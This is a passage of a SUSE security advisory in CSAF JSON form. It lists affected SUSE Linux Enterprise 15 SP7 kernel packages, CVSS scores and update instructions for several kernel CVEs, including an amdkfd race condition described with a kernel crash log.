"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68171"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
